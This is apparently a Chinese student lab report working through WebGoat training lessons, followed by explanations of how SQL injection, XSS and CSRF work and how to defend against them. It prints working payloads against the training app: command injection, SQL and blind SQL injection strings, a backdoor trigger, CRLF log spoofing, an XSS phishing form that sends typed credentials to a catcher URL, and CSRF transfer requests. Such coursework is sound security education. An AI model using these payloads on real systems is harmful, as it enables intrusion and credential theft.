Exp9 Web安全基础

一、实验过程

0.开启webgoat

(0)下载(地址:https://github.com/WebGoat/WebGoat/releases/tag/7.0.1)

Exp9 Web安全基础_第1张图片

下载完成后,将文件放到主目录下。

(1)输入 java -jar webgoat-container-7.0.1-war-exec.jar 

Exp9 Web安全基础_第2张图片

(2)浏览器打开图中的url: http://localhost:8080/WebGoat 

(3)选择登录表单下面的任一用户名和密码进行登录

Exp9 Web安全基础_第3张图片

 

 1.命令注入(Command Injection)

(1)在下拉框上右击,点击 inspect Element ,在 AccessControlMatrix.help 旁边加上"& netstat -an"

Exp9 Web安全基础_第4张图片

Exp9 Web安全基础_第5张图片

(2)选中修改后的值再点 view ,可以看到命令被执行,出现系统网络连接情况:

 Exp9 Web安全基础_第6张图片

 

2.数字型SQL注入(Numeric SQL Injection)

题目大致为:Try to inject an SQL string that results in all the weather data being displayed. (通过注入呈现所有的天气数据信息)

(1)通过观察给出的SQL语句,以及点击提交后呈现的数据发现:“station”参数为注入点,直接在页面代码里的option标签的value值里添加  or 1=1 拼凑出语句: SELECT * FROM weather_data WHERE station = 101 or 1=1 即可产生注入

Exp9 Web安全基础_第7张图片

Exp9 Web安全基础_第8张图片

 (2)注入成功

Exp9 Web安全基础_第9张图片

 

3.日志欺骗(Log Spoofing)

(1)灰色区域代表在Web 服务器的日志中的记录的内容。目的是使用户名为“admin”的用户在日志中显示“成功登录”

(2)往该应用中注入回车(0d%)和换行符(%0a)。在username 中填入“helloworld%0d%0aLogin Succeeded for username: admin”

Exp9 Web安全基础_第10张图片

 

4.XPATH Injection

(1)XPATH 注入发生在当网站使用用户提供的信息查询XML数据时。通过向网站故意发送异常信息,攻击者可以发现XML数据的结构或访问那些本来无法访问到的数据。如果该XML 是一个用户认证文件(例如一个基于XML 的用户文件),攻击者还能借此提升自己在网站中的特权。使用XPATH 查询XML,通过一个简单的描述性语句类型,允许XML 查询,找到一条信息。

(2)题目要求是使用帐户Mike/Test123,目标是试着去查看其他员工的数据。

(3)在用户名处注入 hello' or 1=1 or 'a'='a ,密码是必须的字段,可以任意输入

Exp9 Web安全基础_第11张图片

Exp9 Web安全基础_第12张图片

 

5.SQL字符串注入(String SQL Injection)

(1)下面的表格,允许用户查看他们的信用卡号码。尝试通过SQL注入将所有信用卡信息显示出来

(2)输入 hello' or 1=1--  ,进行注入

Exp9 Web安全基础_第13张图片

 

6.LAB: SQL Injection

【1】Stage 1:String SQL Injection

(1)以用户Neville登录,在密码栏中输入 ' or 1=1 -- 永真式进行SQL注入,发现登录失败

Exp9 Web安全基础_第14张图片

(2)查看发现password的最大长度为8,将其修改为20,再次注入,成功

Exp9 Web安全基础_第15张图片

Exp9 Web安全基础_第16张图片

 

【2】Stage 3:Numeric SQL Injection

(1)该题目的目的是通过注入语句,浏览到原本无法浏览的信息。绕过认证执行SQL注入,通过一个普通员工的账户larry,浏览其BOSS的账户信息。

(2)我们先使用上一题的办法登录进Larry的账户。(即修改password字段的长度)

(3)老板的薪水应该是最高的,所以把其中的value值改为 101 or 1=1 order by salary desc -- ,这样老板的信息就会被排到第一个

(4)点击 ViewProfile ,即可查看老板的详细信息

Exp9 Web安全基础_第17张图片

Exp9 Web安全基础_第18张图片

 

7.Database Backdoors

(1)Try to inject another update to update salary to something higher(利用UPDATE语句,通过SQL注入“涨工资”)

(2)输入注入语句: 101; update employee set salary=10000 ,成功把该用户的工资涨到了10000。

Exp9 Web安全基础_第19张图片

(3)接下来,添加触发器,其功能是创建SQL后门,把表中所有的邮箱和用户ID都设为指定数据

101;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='[email protected]'WHERE userid = NEW.userid

Exp9 Web安全基础_第20张图片

注:由于WebGoat 使用的是MySQL数据库,不支持触发器,所以该课程不会真正完成。

 

8.数字盲注(Blind Numeric SQL Injection)

(1)题目中说明了下面的表单允许用户输入帐号并确定它是否有效,即返回值只有账户有效或无效两种。目标是找到 pins 表中cc_number 字段值为1111222233334444 的记录中pin 字段的数值。pin 字段类型为int,整型。输入找到的数值并提交,通过本课程。

(2)先输入 101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 10000); ,结果是 Invalid account number. ,无效。

Exp9 Web安全基础_第21张图片

(3)通过二分法,不断尝试,确定范围在2000-2500之间,继续二分法尝试,最终得到Number为2364

Exp9 Web安全基础_第22张图片

 

9.盲字符串注入(Blind String SQL Injection)

(1)下面的表单允许输入一个帐号,并检测该帐号是否合法。使用该表单的返回信息(真或假)测试检查数据库中其它条目信息。目标是找到 pins 表中cc_number 字段值为4321432143214321 的记录中pin 字段的数值。pin 字段类型为varchar。输入找到的数值(最终的字符串,注意拼写和大写)并提交,通过本课程。

(2)同样可以通过注入的方式查找到该字段的值。查询语句非常类似上一节:

101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 11) < 'M' ); 

 该语句使用了SUBSTRING 方法,目的是为了取得pin字段数值的第一个字母,并判断其是否比字母“M”小。

(3) 经过多次测试(比较0-9A-Za-z 等字符串)和页面的返回数据,判断出第一个字符为“J”。同理继续判断第二个字符。

(4)这样一步步尝试,最后确定用户名为 Jill 

Exp9 Web安全基础_第23张图片

 

10.跨站脚本钓鱼攻击(Phishing with XSS)

(1)题目要求是关于一个页面中存在XSS漏洞时,如何支持钓鱼攻击。要求我们利用xss和html注入达到这些目标。

(2)使用XSS和HTML插入制作一个钓鱼网站,将其输入在search框中,代码如下:

form>
  <script>
function hack(){ 
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
} 
  script>
<form name="phish">
<br><br>
<HR>
  <H2>This feature requires account login:H2>
<br>
  <br>Enter Username:<br>
  <input type="text" name="user">
  <br>Enter Password:<br>
  <input type="password" name = "pass">
<br>
  <input type="submit" name="login" value="login" onclick="hack()">
form>
<br>
<br>
<HR

(3)输入后下拉网页,会有用户名和密码的框出现,随意输入用户名和密码

Exp9 Web安全基础_第24张图片

Exp9 Web安全基础_第25张图片

 

11.LAB: Cross Site Scripting

【1】Stage 1:存储型XSS ( Stage 1:Stored XSS )

(1)执行存储型跨站脚本攻击,以“Tom”身份登录网站,修改个人信息。验证用户“Jerry”会受到攻击。每个帐号的密码是用户明名字的小写(如:Tom的密码是tom)

(2)以用户名“Tom”密码tom登录,选择Tom,点击“View Profile”按钮。现在可 以看到Tom的个人信息。点击“Edit Profile",在“Street”一栏中进行XSS攻击。加入 如下代码,点击“UpdateProfile":  

Exp9 Web安全基础_第26张图片

Exp9 Web安全基础_第27张图片

Exp9 Web安全基础_第28张图片

Exp9 Web安全基础_第29张图片

(3)退出登录,以用户名Jerry,密码jerry登录,选择浏览Tom的信息,会弹出如下注入脚本,攻击成功

 Exp9 Web安全基础_第30张图片

 

【3】Stage3:Stored XSS Revisited

验证Bruce的个人简介中包含有XSS攻击,使用David用户登录,查看Bruce的个人简介,出现弹窗,表明存在XSS攻击。

Exp9 Web安全基础_第31张图片

 

【5】Stage5:Reflected XSS

(1)使用雇员搜索页面漏洞构造一个包含反射型XSS攻击代码的URL。验证另一位雇员访问该URL会受影响。

(2)以用户名Tom,密码tom登录。点击“SearchStaff",在搜索框中,添加如下一段代 码即可完成:  

Exp9 Web安全基础_第34张图片

(3)点击“hellworld",这就比如刚创建的帖子,由自己或者其他人浏览,然后会弹出一个对话框,证明XSS攻击成功

Exp9 Web安全基础_第35张图片

 

13.Reflected XSS Attacks(反射型XSS)

(1)1.当我们输入错误的用户信息后,服务器校验输入有误,会返回错误页面并将错误内容展示给我们看

Exp9 Web安全基础_第36张图片

(2)如果将带有攻击性的URL作为输入源,比如,就会弹出对话框  

Exp9 Web安全基础_第37张图片

 

14.Cross Site Request Forgery(CSRF)

(1)要求:需要写一个URL诱使其他用户点击,从而触发CSRF攻击。 以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的,用户一旦点击了图片,就会触发一个CSRF事件。

(2)查看自己电脑的Screen和menu的值

Exp9 Web安全基础_第38张图片

(3)在Message框内输入 "http://localhost:8080/WebGoat/attack?Screen=2078372&menu=900&transferFunds=5000"/> (这句话的意思是将Funds即金钱转到自己的账户里),点击提交之后可以看到信息

Exp9 Web安全基础_第39张图片

(4)点击Message List下的链接后,攻击成功

Exp9 Web安全基础_第40张图片

 

15.CSRF Prompt By-Pass

(1)和上一个类似,发个邮件给newsgroup,包含两个恶意请求:一个是转钱的金额,另一个是确认转账。

(2)在信息框输入

"attack?Screen=1471017872&menu=900&transferFunds=5000" 
width="1" height="1"> 
"attack?Screen=1471017872&menu=900&transferFunds=confirm" 
width="1" height="1">

Exp9 Web安全基础_第41张图片

点击提交后可看到链接

(3)点进去,发现攻击成功

Exp9 Web安全基础_第42张图片

 

 

二、基本问题回答

1.SQL注入攻击原理,如何防御?

  原理:

  通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令的目的。

  SQL注入攻击是利用是指利用设计上的漏洞,在目标服务器上运行SQL语句以及进行其他方式的攻击,没有对用户输入的数据进行过滤消毒是攻击成功的主要原因。

  防御:

  (1)对漏洞注入点相关代码进行代码及SQL注入关键字的过滤,以规范代码安全性;

  (2)不要使用管理员权限的数据库连接,为每个应用使用单独的权限有限的数据库连接;

  (3)应用的异常信息应该给出尽可能少的提示,最好使用自定义的错误信息对原始错误信息进行包装。

2.XSS攻击的原理,如何防御?

  原理:

  XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS,XSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。

  防御:

  (1)统XSS防御多采用特征匹配方式,在所有提交的信息中都进行匹配检查。对于这种类型的XSS攻击,采用的模式匹配方法一般会需要对“javascript”这个关键字进行检索,一旦发现提交信息中包含“javascript”,就认定为XSS攻击;

  (2)检查用户输入的内容中是否有非法内容,如尖括号、引号等,严格控制输出。

 

3.CSRF攻击原理,如何防御?

  原理:

  CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。

  防御:

  (1)对于web站点,将持久化的授权方法(例如cookie或者HTTP授权)切换为瞬时的授权方法(在每个form中提供隐藏field),这将帮助网站防止这些攻击。一种类似的方式是在form中包含秘密信息、用户指定的代号作为cookie之外的验证;

  (2)改良站内 API 的设计。对于发布帖子这一类创建资源的操作,应该只接受 POST 请求,而 GET 请求应该只浏览而不改变服务器端资源。

 

 

三、感想

  这种闯关式练习,对理解SQL、XSS、CSRF的概念与原理,有很好的帮助。在具体的实践过程中,一步步探究如何注入、攻击,最后解决,这种类CTF实验的体验感非常好。

  最后一次常规性实验到这里就结束了,不过对安全的探究是不应该结束的,在经历了一个学期别样的技术课程学习后,收获挺大的,网络安全,不知道算不算入门(小门也行^_^)

  感谢老师的教学与指导!

 

你可能感兴趣的:(Exp9 Web安全基础)